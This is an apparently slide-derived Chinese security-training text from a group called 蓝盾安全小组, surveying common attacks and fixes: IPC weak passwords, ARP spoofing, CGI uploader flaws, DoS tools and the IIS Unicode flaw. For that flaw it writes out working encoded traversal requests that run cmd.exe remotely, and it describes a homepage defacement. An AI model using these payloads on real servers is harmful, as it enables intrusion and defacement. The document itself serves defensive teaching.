1.常见的攻击和防范(新)

蓝盾安全小组前言：在网络这个不断更新换代的世界里，网络中的安全漏洞无处不在。即便旧的安全漏洞补上了，新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击。蓝盾安全小组蓝盾安全小组蓝盾安全小组一、常见攻击方法1、弱口令和IPC入侵IPC是指“InterProcessCommunications”,准确的说是ipc$，是默认的在系统启动时的admin共享。（1）操作系统默认用户如：GUEST、IWAM_DAMU12A5UQCWDJL（2）应用软件默认用户如：SQL的SU用户蓝盾安全小组蓝盾安全小组二、UNICODE漏洞UNICODE漏洞是经常被入侵者利用的漏洞之一。在2001年5月1日黑客大战中，黑客们就普遍利用此漏洞对各国网站进行攻击。蓝盾安全小组黑客可以远程通过IIS执行以下命令，列出指定URL中C：\盘根目录下的所有内容。:\+/a或:\+/a通过相关的操作查得该主机WEB页为：c:\inetpub\蓝盾安全小组下一步是修改主页::\inetpub\修改页面完成，首页改为:hackedbyqting解决办法：A、及时的装补丁B、关闭没用到的端口蓝盾安全小组IISunicode漏洞:/scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/check.bat/..%c0%2f..%c0%2f..%c0%2f/winnt/system32/cmd.exe?/c%20dir%20C:\/scripts/check.bat/..%c1%1c..%c1%1c..%c1%1c/winnt/system32/cmd.exe?/c%20dir%20C:\IISCGI文件名二次解码漏洞:/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir蓝盾安全小组3、ARP欺骗ARP协议是“AddressResolutionProtocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须要知道目标主机的MAC地址。IP地址＜－－－＞ＭＡＣ地址逻辑地址物理地址蓝盾安全小组蓝盾安全小组Internet192.168.0.3被投入ARP欺骗木马3、CGI漏洞攻击如：UPLOADER.EXE如果使用WINNT作为WEBSERVER的操作系统，入侵者能够利用UPLOADER.EXE上传任何文件。解决方法：将UPLOADER.EXE从WEB目录移走或删除。蓝盾安全小组4、拒绝服务攻击拒绝服务攻击是一种遍布全球的系统漏洞，黑客们正醉心于对它的研究，而无数的网络用户将成为这种攻击的受害者。TribeFloodNetwork,tfn2k,smurf,targa…还有许多的程序都在被不断的开发出来。蓝盾安全小组蓝盾安全小组目标主机国内黑客台湾个人电脑（跳板）-----------------------------------------------------攻击方式的分类后门攻击拒绝服务攻击分布式拒绝服务攻击扫描攻击缓冲区溢出攻击远程过程调用攻击网络蠕虫病毒基于CGI的Web攻击基于Frontpage的Web攻击基于IIS的Web攻击基于Coldfusion的Web攻击前导攻击ICMP攻击SMTP攻击其它攻击蓝盾安全小组